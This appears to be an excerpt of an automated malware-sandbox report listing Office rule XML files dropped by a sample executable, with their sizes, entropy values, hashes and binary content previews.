                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700350v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.876450258816002
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ILIOmz1e8eON4gxzryMmDsUIYxlNdkC6vWi76iBGb0CrM2H0p8qUL6OfbazLzaZL:ILUROm4VDXIYxqvzU0iH07a6OGucID
                                                                                                                                      MD5:130413ABAE14030B43FEE8DF2E05C83A
                                                                                                                                      SHA1:7EF76C9F2BC0FE78DFE8A1478205DFCECA253949
                                                                                                                                      SHA-256:B39D7430C047A90504EB74638C60AE2E2ABE0757862D7413E0306B8D3551CFE6
                                                                                                                                      SHA-512:705459C922315243EA05AC3860C5E3E905A3FC92277838AB4EF0C94CABB497CABF09A9F5F5C43DCA6B7FC4167148E78296502D5C764A2850F068CDA6CE20DCB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml9L...Te.j.^..._.{Q.......L(.}.t7...XT..F............'td.gII..._.=$...#$.w........QFW3.C......cQ0.h*n.]...n...Z7._./._.... X$c....G.b..R...&m.....{.1......O....Ks.NM..ajqmXfy.....I..[v.jQ._.....V..U..,|WU.s.../.P..Q..F.....1....+...6..=.*v.............).%_H..%..Y.........<qsBU7..GG.....U.E......@.#...!.=Fx.'1D?.~).2.n.'.w.>.WT..._..{....D.!vq$.....3..D..85#.MS.e...A.t.........Y$...C.o.e....p^2.\...>..~c.XqK......j.@.G3s.F.u............}uAd....V.#e.q.\.............8-..%B{i.j4...zz....>y2.hq.N.RT3 .b.du..iN...t4(F.nD$...>..Fx-..f..JFR{C.......I...ki[....gr.#..k...{.......%.J8.aw.9;.9..R.....N....P.....V.pA...M....u.^..{.8.Umf..w6..aq...ns[r*q..*`.P..j...r.F........G[/.d25.C.E!7..X)K.~...3B(..3+?..(..>}....R.....M.../I.t].Z.cQ.RJ"4...mQ....5...9..l+..kC..:0.Z8n/.....B.. z...........3.W. |#.z.... ..>...q.{{.lH..%LD.8.7..U..v..U>....Bc..V=y...o.*nN..F.4.Zuj>..F...?....%.q......*}8.Xj|...i."\....F.V....,...R|.`.G..v....5.8.2MM.r.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700351v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.874370576423507
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2oJr0FMy5Z0dz1MLHMiaDEB9KMzsLGcV/zGprolH2SbkD:2oJIF7Odp8FPB8MsG+siDw
                                                                                                                                      MD5:F78F743EFB53AB52BB47FEAF0B422C48
                                                                                                                                      SHA1:5AFF5E3D003C79465E866FF26E5A1645C3308473
                                                                                                                                      SHA-256:2290014A14FF8D2D683A1777DBEF43DEFF10C4B98ED021D966F7B10A79DBE670
                                                                                                                                      SHA-512:AA1CEDBBDFD61929B7ACC28D98C8762EBE7A92CF8230D68F588DE1537EF821BB97572CD5C0B64D19CB61427035E2BBD4770E43058D83CC62AFDA707377EFA247
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....~e.<K..zzk..6..../R.m.I....?."....y.0(.a..... &....aA.J.).U.y.up.xg]D....6"......]ty..c..6>.d^2.".(.........L.S<)K.F....."..9~.....A.V`.u.4+..!..;....V.#e.>...p.F.g..H...m......GJ.~..c-.0.}Z2.."=.E..I5......P.bH0...og....I.B;...@.R....(.7x.}..!.Nc.kK...7..z..v.?<5#..:.g.A.P..8.PL...1...j....D...h.8...s...l.D..8.?....Q..&.W...~.D....%.....)....>.%.-....._....f4..].I.g....0j]hq.C..:...VM#>..}...dV.m.p....&.6s.....-.U.}...Q.R...{.3....0.@20AX4.....A...C.TO..j....[&F.A.(.M.Zx..U[.c..~....Y'.......b.sc........?X.A..$.jeJ8.....5...R.c8A.,.O...T....T.-._.....D5`..[Z..LzS.. O8..{..@=V.fW..,v6.`.J.@..cI..n......$.........c:....x.8;....39.. ..k.k.HP..V...J.,..,%\.8o.Q..B*.p.%96.%b.'..b.....S..:bO.......>u4.y...aj..................{h..0Z?k}.....5...M.. ......s4...0i.b.M.D~p.8..YT.=/......t.....1xT:.......G...y.V...J..;..%.[. ....`hQ..\b..Z.M.,~kX.!E........A!........2.?.+.....F.a.y.R-9..*...N..{.s....f.C...9...cm2c...y`Aw."...T

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700400v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.874930294913325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:SnTOYSK3u9GILThlXz7ie3dlpuXmqSJbDDG2SD:SnKYSKehHLorSJbDS26
                                                                                                                                      MD5:3AACE8B23EC24742AB418C3B32A50D53
                                                                                                                                      SHA1:0F7511C38F7B8AE0F6516E93FA4643D79461CD3D
                                                                                                                                      SHA-256:3FD233AA4644DE2545F15EC0020CCA594C4977F9A8E5BB087DC193A201BDEC86
                                                                                                                                      SHA-512:E73ACE84C54A42BD57D05332F7317AF9FCB59A8421B1D85F5C65A025FBE42470202B8D9610AB43CA443269F485CDA31E158C1AF24545C66F54D4D6C8A446D782
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.........b_.%D\>P?E....e.n.?...hJ>...d.J...D.t.B.^@.Bi...!(..qJ.w.......x#Z;..S,x.G./. l....N....u^q`;V..n...... ...UJz.Y........m.Svz.MB.-igN...8..;.9|.,Hc.L$.X..2.vK..x..=..9.....U{...CU.Al.B.D...)..]........(.C[.}..Ow@tFe4.P.....|.NN.>Z:<^...*.1gR..D...O...K.sP...#.Z.......@{g7.1..R.o...._..".).7.8...s.i^kK.....<..e..3.)~.=.Q/.>x...-..xB.F...E.....Q..W....W#._h....D>!..*k.`.).U.3.clEem....q..GC.6..]D#....m.....z5.HVI9.%.....?11..F.G.S...Pd...G_..j.T.3".w..=..jd.u...~..|V...{..&.7..j.&......O..c...{wF.H7...4....O.._%F{Mw...Y.]v...7...R.,Vt.eW>..P8...|.0....N...*....3.......B.)+..5.......r.kQ.N..........W......f.J|........#.cR....RZ=..hO...5.w.Fy.F.|4L..... .;Y....R.g@.......=OL.7Z...#NL.g...... $3u....-._......"g4.....8.....q>.*{\5.E..$.u:x..>..y.^...A.EP.Z.."=.X6[.z...3......,...M.b.<Zu...._4.x...V|...iw..^H.xzK\5N..(..y..>K!....~7.p....p...{N.2...2.z.P.......CG.....B.KjpQ....F..Y..........&8.:#.G.Z......M.....1.r.~..~....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700401v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.880160251508468
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:uohVBACGQ9LoVfiSzu5pJYcVImJzyD48YShbxD:zr9BNKPzuBYcduf95
                                                                                                                                      MD5:AE7E1EF97084388D8C5F00D9756A269C
                                                                                                                                      SHA1:12CE657808453913A41CD46DAA8C5B4CAA327503
                                                                                                                                      SHA-256:A208EBB4C2CDC8973888970087749C872397A453B779E501BD8F531BB28B3CDA
                                                                                                                                      SHA-512:E286A7254426BE84D3549E87B06370AC728180AD91F3857C26CFE7C745A426C1615647E833D52910302FC1419F184505360A148F791830D0694AFACF24B0F3DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.gE.A....|.......M....#..'g..P.....g..;.a..|.Rw....\.....e".*....%.7..5...;.#.O.$.O.(..9.@.z.....&.T.d.f..e...4.....q...7.....\...4....E..&Et..V..F.TG...7;..8..<-m:.m#0....`..Y..:=R.'..:G........D....rDh.;e......<...k.E.K......1...viiZ.V...g..8..6.<{.:.x..~..kl.....j.Ng/_..].e|k....i.E..s5k..(.....\....m.J...b...R1....9..y..u......nc....c...hu...g..z?.t:....AG..t.R.}...m.....Q..D".v2W.U.&....VF.^....Ee....8?.^..n...)....3....G....>...9.<.....I..YL...z.|.....1.....\:.j..$..Em......vu..Ts....."T........}X....bb.u.RA...':l`...>...&.w.#;<.^D...y.......r^.... ..@b\3.....(.1......%h.D.l&j.|a-..x,..t..a.Sq}.i.M?..."o.....=..2k].`.^...A.U...8u...!......=d(...$.A..y...I$..-q..d..dU.8J.=t..Tg..5..k....~..5.]WZr...O.......|.....ih......&)..xO.......p.^t.)$........w..V..J........m....t70n2.G.n...+.K.aP<..Udx...j[...F+:.....#9..L._....V@-qu.`...;.&)TQ../.2.....~.K..Kac.......u....;.v.k. e.&.SGh...j.z..D3}....F#.f~.."...I.%0..."...>..f../.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700450v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.877593004164432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:acvHmosRtOJwi+o9UIF180ER954zGUfSTiquSR1D:LvGo4ed+eUITc3F+sf
                                                                                                                                      MD5:C74DBDB7BD87B21F21DC13472CC9E17A
                                                                                                                                      SHA1:44B27BFC969EAD7B370A75BC961A27F142955960
                                                                                                                                      SHA-256:1EF5789B06E083CE3CF7A453D9AB0544C3E3050D5EBFBDBFECC53A05B2D3BF79
                                                                                                                                      SHA-512:AAAAF916C1CD79696EA39DD9CFF5097897D742201832142B23EFD316146BA1AF5F51B8043732819023F29F2E3C5ACC8851EFCC9DEE6C9DCDB6C2C1F8B56DC6C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...}[.nW.l......P..{......3.......c...t4;...&....:..B.H...%.r.e_.[..?P,c*.J...QykU7g.._4...ZA..._}.y6`.....u.?...u....gf...kf..4b|.wJ.#_6..}.0...LT....(.,>.#.*.o..eR=...E{..c|5 .....-ERkq.:B....,.gJ=.....V..esg(..y}P.kS@.Gq.#1.@..^...WQb..{.2..a...b>.......]B$........O....7.l$.....+B[......?...&.l.M.....2D.O.'....6.R.$$.4S...O.3.W1.~@....7..>..;.(=+..Ck.C(.N...n.Hd:8..@F..f^..'..l....t....s2...Tj...\.&aA..~....t..."...;..OY....=~...Nwr@...u...\s.....Wr-5v...g<...&=?....B^.~mV..6....2....>NQf.*/..F.d......2.`.&=..`.?....?.._p.G;[8g.....1.. .....N.m.,......?..8.B.Z.V......v..4GNeS%.......J.Kr9. ..'/x..K"rh7..?...h.~/.[..LV).dI...%,...K.2....82LH0.!Z.+(..C..jbJ..M.q..}...0.'/.1dm.0.J..........7..@.u.....z3$..U.. c.c...1......w..=. ..wG.-.../....C..R>....r..PcW..;...3.w.0.j.J."o/........y.u.p.GLXE.L.i..rC..?i.>/ERu..l.g60XI=.2..@..v.M...>..|.=..j......<..u..k"....q.QE.-......0....#@$...O.mw?.2"..=.,.Ml"$.....HLq...aW2....=..U

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700451v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.8972749251252425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:TwDRjIMJBRCUKe9iHPuzInhnR0rbIaGY50JGD:ToRJqeUvuk9ar/yJe
                                                                                                                                      MD5:421EE96B4506FBE5E16606E5405617ED
                                                                                                                                      SHA1:2C2DC332CC33146CA6D8A52E3FEC5DBF9D0B5FCA
                                                                                                                                      SHA-256:5E912E08E3E152E4858951C6E11A90F00E2A5F54797FFBAEEB29EB62A0DDA686
                                                                                                                                      SHA-512:F92989D91C37B455A66C780087E4F58A8E68712B2E72698FD467BE3CF6B0F0F5E9E57C4036B720929E651CF06140E10D1FE48AAF167FC8146301673C0ACA07B8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.I.!o.j|..Z....-]..Z.^Y@K.g.l..~}..O..Q...D|F{....).......n......'.._.....w.N|3........J..U...C..H.-o.l..R"......`....l.`.?..\....1...xY.).g......Sw....a.].....@......s...Q]...H..\/..sG.....v.5SvE.Q..!.y8...P.....W.zI...k.D$X...,7....>l./T-9A+W.......-T}.z.7:>.:jxb(.!>..M..%.....x._.L....]|..dns;......X...B...3Ei.7....1....,..."..d(..+..v..j.n.:....c......K.....$..=..A..V...O....H.W.d..-..q..0z.....0...f...s...z.....vL...\%A+o...../....PR..(....}.T.@...v...I.MX.,.'....j...$..6!8p.%&......H.+P.a..+d...._\.(.o=..b..y..S....!a..?K.qW(.n#.Y.}.?.yF..:..i/...._.|k..__3....1~=....bA. 9@G.`-UT..N....W/..q......Z>,....?9.m2.9...h.;nrK5.+.c.R......s[... f..n.%,.J..9..$...|F....{6...0Ph.K.>8Ef.4..W..cf...I......_../...J....2...H..gEs*.......[6....9}.{...._.........._A<.m.....X..8H"....e.hdk.6..5|2...h~..e...3<.....W..M.....%.....tW.q!A...T.....f..o.HB....c....4.tU.vw..M.^.T.v..^.Kd.D.Iacs.G.X^..Xs...o;.......g].r.....a......p...cnE....*.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700500v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1701
                                                                                                                                      Entropy (8bit):7.879969448567139
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:c60z1RAfy26/RYbL0JQqo/K55KN/n4ZhyZD:tqXAfy1YbLco/i5mnI0
                                                                                                                                      MD5:C113C5128860ADFEA2F8BA2CE1419B46
                                                                                                                                      SHA1:716D9BADA058AE44F60C77ACA34CA053FDA5C8E2
                                                                                                                                      SHA-256:2AB3C9137D776C607B8F3F278EF34A4AAD75D9C1AD7FB1ADBB5691143508D630
                                                                                                                                      SHA-512:5C3B195A1099BACD4FB4F0843A4E40D0CCFB51B90B780D6D0BC6D41CE1549CB96DEE99FDEC107E812EE5143661DD4870A28779C74A1CD553F41051D15EA0BF2B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.b..."}...'};..4`...;..gP..9.Q:.1,p...g...jF}..s...d..l..&.cD.1.5{,.[..Ztu.Y.=8c........3.MV#....t\. .z.D.ks.E..X.*.."..2uFX!9..D0..Z....q.E...........n.=.K.vc.M<..t.F..!o...V...>.E....Ea7.7=....h.......e.K/..=..67^)...n..vw.'.u~LEI.Q.6...v!..^gz..a.p.C..C.vY~G.[C.[9E..y."...|'5.....o~...X.....f%.A7..*..(...k.......MG7x.Dtg4........d.{.V.B.Kd.'.P.`k.&8~.?...*2.....h!2.y Qi......cp.U..O.tT.......(.b.k.y9M.A].m.y..H.6v.\.>..>...Cx.L''....@5..P,.eg...v.&...j.O..n206s.4......U.^.";".....r..)f4A..;....7......M....Pr....i......B.........xe..O....WT..w<..v..,...M..2..0 ..0.x. km;1.-...m.`..?e.Vnq......!..%.......p:..j..e.............>....xP`.K...g.F.`..n.$..w..^U.H<W.:6.$....iF.}TO...l...k...5>.....8S..s..........!T......:,.O..x....Y..Jym....P..Q....~....1_..AX.r+.jV%......'....Q.......48....*_\dt.....T...o......P.x....M"..aL..U..(./.?W.3.r.%'.xg..8....w\.$.t.g)+4.....o.]..u......cO.[...}..o/..1...[..P.4.....Np..=.~.&.B_...z,...5......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700501v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.878266874303708
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:4T1U5IIBopDLmLOrptVBT7tTfyoPWYydXwjrchZD:4+5IjpfAwptVBxfjbaYw7
                                                                                                                                      MD5:91C5B43FBAAF7B4AF6E4607AD3730D52
                                                                                                                                      SHA1:B039DC5D9DDD47C8F185E69213EE33CD68E915DF
                                                                                                                                      SHA-256:B2BB07ED49AFD703287CB85CE077E31317215FCA6354CC76A13A0D4525823767
                                                                                                                                      SHA-512:EA7609C5FC22EDCE26C49DE0888178A4776D34FCCB403C0AFB2EA53230A716392DB5A20D5954BF9B0F81E3A1A9CED65D645BACB45332CE6011D90978329C74FB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..c_..s....Z..I..T\I+u..*.&..r..@&..7e........N.m'+TA>.>.R..e...?j..l.3.XFgx...|..v _...#.@.....I....qx.l.J 6'#..e.\..zY9.w.^q..Jx...~..n.....j...<.^N...\.VB.e>!.n.D.....#E...[...>..v.P..Pm..J.O..~..$..I..2x......@d...k..)...e._.g...I.K...b|z.L.D..-...U.n<.Q...&P..Ti......-.fSw..].bH.IB....D=.7i..V.....<..Z...5..VG..F..8..._X..<.4}/X.WfGg.-.a...E.Xv.._C....e.G.|.A....y...2.Y....^..T(.~.....18....5..v..... .k.6.G~)......G..L.D...@....TzV....' ._..n.I...VO..(.P%........y@.:.....5.G.......}.6F."1.F..l..........U..D...aI.0\.@*:.9Q6.....M...(..15UYU..|; .r...]N..d....sd(....br0#G.,....$....N>Q.e..o..<..Wi...U~.V../..U2i....l...9..+D.H.Ys.J~H....\.}gG.HN....-...M............".....DU..d.!F1w..YFyw+l.E\....X.....6F..\...R.!3....E.M\...X.E5my...E..y..%;.p V.4....]...=6n...X.|...tU....@,.+........g..#..c....%.R..e?;.L...g&8.eWMz5c.....w.]`#..i.X..(..y#5rP_eH.........a8w..J\...j....~H.Q_..c.1.m.|.......H...@..0.p.L=..Y..~2.l=c.<

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700550v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.865037634472812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:up9/m01o7yBU5DsvDfnA18f2+K2EdfTrshykWuYnsPPBnXD:uj1oJgvYw2v2EdfTrsAkzYslT
                                                                                                                                      MD5:B5F21B114D7108631724B738562B158A
                                                                                                                                      SHA1:0FBB59AA09CC56BAEBB01062BB3D22B7DE9AB76B
                                                                                                                                      SHA-256:84C893DB308DA6CFFBD88275229FFA81AD9C27857303CB102CC131EF711B6926
                                                                                                                                      SHA-512:F7A793DB1B54C06360EDE1D0825960ED24503A6B6DBAB78D853B7A1E01FD68574498A2050D919F35E0FBA8929C1181FBD9F422C3BCC7FC65F80B9AF8EC6EEAE2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml*.O.A.i..n..f..[...u..L.1.....>...>.......=.5..e=A..n.pl...4....,FN..s..4..MNW.wQY./|..h?.)..q}....}o..Ci...b.oiH%...N.]...8so}.(..._.\s..GT.....d...1......!..t.c4.<..s..W`...!.O.]~.......(n:.&.../..T....p.8.7....e.`d...f.M^6.?nT>.+..........v...TD.s..2.4.....!0...-?...._....zg.j(u.|.R..w;.P...:[.?4.yu...FV.@..}.J..].hk.v.....SO{W..f..>k.]..C. ....8..T........Z:."V........5tq.q...Ga....i.R...I..Gnc..m....e..<..#r.....R..'kvR....C.5.\...F.+..A..n........;..........[..s..T..{.......)D...|#...&..e.pK..p.......S......Cs...=.....a+.x...4.].....2z.%o{...|t`...$(..e.3.T>o...Xg......W.....X.k9u..D..pq<.n.....q-.....|Q.0B.....t...y.eM.p0.F..#6xPq.:..6...]...m.i.}..F.fH......T.M.."><...R..$n]...]..JeD.-=.9...B..."eB..'.1?....E.....7..._.l...>.....P.UA=..`......v..-.......s..VLSx.....i..~q)K.=....5.<pB.9a.. ..\..l...J..K.:("*...o..6..GaD.]a...e...v.U6.......=w..7..ID.....-tw./....S.E.V#O...V......<.5..\...2..b../-.Z..V.kw.....F&.B|.*p...\Zb......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700551v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.889349643466075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MLMepwWtFPA1SEolJ2k0+Pz7i+P67seg4NHY80JopuoD:atFj4P+PK+CNHDm0
                                                                                                                                      MD5:7A9B4E63915995F9112142A4783C4E7B
                                                                                                                                      SHA1:C4AD06ED73B34BA78FD0AF5ECD2957A4119A0CCA
                                                                                                                                      SHA-256:6E23292F13B4EB7E3B8E99F34E21A6655B1665E50B5F7E2C9B5A19209CCA923F
                                                                                                                                      SHA-512:71B83E4E1D9EA26CC3B68198A72F99624CF86B8B3E3CE6BACBB9648237E2934F2372FD9C8A89664441CD6188B12C0AB07F1751408FE489EE5AC0262347D8A584
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...hB/yV.f....R.mSo>......).I.g...P.k....t...0..V....@..q.o.Lh..l.t.0`.F..h...|VXaY.'.i.."_CeF.9[........%N..M........;">3...p..s**.5..,9...WZ...78+..FC.&w..........7..........P.N.}....,,.tE....)B..,..t.&;.........0...k..uN........C.U.<*.m...V...;#.J..T|7...`.+qC.m.....%..8.7....EM0..p......Bi....#.G......H.G...o.k@*WB.-ig.-.......5......+...._l.q.0...%.gH...L....~.p.D..i..? ..\R$.../e.A=.l...t...^'w.j...*)...F.:.MB.U.!K...^d......LY...C....ZA....H.ci.I.. r.y...Z...t.,.e....&rl..Q....U.Ak....BX!e. lP=.K6.QF?:........J.5..J..D..2G...q...x....7....0.K.CC_s........Kc......Fs...FN$s.U.g...V..../.8.j......0.s.8..|.[5..=..y..|.Z."n..!h........#.>....Sa..};J.=...vr.M$.\.M.."8..I.W.`...)..%QEn@..Gp... ..4.J.....)c/.r.Z\.....@...n6$%{F.P...'&..r.....j.Z.e.O....n.._T.>..L#..2.v...u.3..N..-[.9`)J.......!....... ..t!5.e.~.).R.%.-...`".R*:WgwI..3.`]D9P.Q;}....'|.8*.s.Y...c.....?=..Y...'.3qk..F..&a.....u.y...QaIPW.xmin.?;<..s...@....7..y."2

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700600v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.873797601948078
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:karOd8bRhz08PyvVTZ1vbWiGA1pJQ5zws/NjVhGgoedQvWdP3URAFxP57UnXbD:od8Rhz08Ml1yBypMV/TomQ+dcEx57UrD
                                                                                                                                      MD5:9CA7B4F1118CE1EC794C48D059CFBD42
                                                                                                                                      SHA1:5BDE09BB1FD440836542429C344D263799D6A801
                                                                                                                                      SHA-256:C447F1906FD7FB5B229D8A39226E43E7A7D73585182B741046AEEEC6F03FE478
                                                                                                                                      SHA-512:7BD0B3F6F22850C8E79509D35E761A7E5F8CA467F5AE65C15991B15D54D09E600A95645512BA05A1F5AD4D7FF96132C1DB698DBEF7A8281AAFE7EDF1E4977C76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmly.\....8.jw3..../.>2.i=WY.>#....M...T.F.......J3??.=)..i...Q...)z.........|s...@....j.kl..aqu...<..%.p..-QN..%.|...<6[-Q..+.Gf'.S.q.(.g...ax......6..\>=..,.B...........Og..5.&.5....-......ft./.}..i.7dzb...9.x..a.h].......$....A....`...c...b...8..W....0@_I.."...q..o.A/66..........J........8..]..>1!m.9c.<.+...'.H$.>....a..E.).x..8.2.o.&..dX..C...0j....)..9i......N...H-.......C*_....b.d.3I.E..=.q......p..=...[ff.S.j......].K .3e..M..O.8o~.a..3/...F....Lc..>..P..FpK.].FG.j.M....?.....$....R..@..W ....o....9..y$......._.#...].5s.;%.*..hN`...aX...r..d......./....{....BMY..h. y.....0n.{..3'..$.9................M..c......Q|.JYj...{..D{pp.....FM.....>>E.1.0..-t.M..+...m...StZ.W.{.'6..E..q$b0V.E.T..]#...S..^G\.....m.$.....5p.=}...*r..g......gR.?;......J....R..x...hx....u..C.:}}i...)...1.EG.,D.I.T}.Y.".W..Z..i.M.m....5)..*....k)g..\.J......j...h.".S...8..z.u}..m.'G...:..+L..Af....J...H?7.E#.*.o..t.....t.2.3..:..5...l8C#%...1S!..Q...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700601v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.887072046284725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xNOpS+gzEGdqT/c8j1Roqj1QNYekh6VaSHrD:DOp1PT/cICMPhin
                                                                                                                                      MD5:E15EB38583ADEA94392925426141EF8B
                                                                                                                                      SHA1:26053850A0A68C27948C8D117FB6C09DDB4D854B
                                                                                                                                      SHA-256:F563DFC83E721B9F815D10796961F34086A650A7EA73365869DB5D9430C976DE
                                                                                                                                      SHA-512:6623380A2B13BC9DEC6F41DCD4AA67F5D806CFCD29A0617F92A23AADF7C447E0AD98577E1633FBF3FBFC7F8AF612AD522F6FE18D2AB917CD7DEF2D1CA37698AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.;&M4N..f...d.....7G|.''"....k.5%@.L..UV.....1......4`;..q*.*.....;V ......2...1...Pc9....N6..d\..CiJQV....{J/A?.,?...!.d...n......#).,.. .0.p.ED.........#..f.\@....Ul.`..Y.s.....O.7...ju~R.w.....{...F0.]-...w.1FQ..b.a.~I......J. ROL.]#..t...\...@,w.\....)G}.A.(..=HY..K.....q.*...6..Y....lD....ne|...u... .W....~[.cb..Mc@.W%e.._..W.V.....~`iP.U.Q.y}.#...B.......!*.vA...LF.X.G.4..........wn#.y...j.....P..I}..4h`..,.W......."h7.+e..Y......b..^.I.\..).L(2......a.3-.J.~.F.. ......4.+K.f.M....".....Ak.2..9^...........%z.....)t..).|]u..z\....Y.q.;.|...4..c..|.B...P.o_. ."E...>........T...k-..*..z....S.|..q....2.%.#F.....8........Z...fbN..>.......F..m.A...._.s..sJE.=.~.q....(/.~_..v4.. ......GLd.^.-....hVv.G,.f.......~.g..#Ni../W..f..O...~...Rd..Qq..>.....v........f1G.......=.z.)..(....&....8n.j.~..;....w.E.d...gcs..DS...........-&..i.]....7.?.._..\.....MI9o..6B..&G&...W...L..P=8......Fl..Jz4o...F.....9T...G...d.6.....Q......dS.....#.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700650v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.871245207151493
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:NU+53ifveHz+4sh/55gO6FVN+uJzIq8ZaFuD:NU+gOT+4shdC+iB8EFW
                                                                                                                                      MD5:FEE3369E5B7133E55E906AC5FF54ADF9
                                                                                                                                      SHA1:60CC661106E00ADEB47E21FD4DC49B7001A89923
                                                                                                                                      SHA-256:CF031F94DE8C3BBC84724635F2B822D8EAAA3DA60F068489E1678DE6C8FEBADF
                                                                                                                                      SHA-512:D7BA461C5C6ED8C2053091EB085D4A8B8CDB0C1BA63506231FAAFD1CED1AAB5387AD659C0045EAE7B7DC7E2B8AD7ED6F74873D9F918698EAE213BB538D9FBA59
                                                                                                                                      Malicious:false
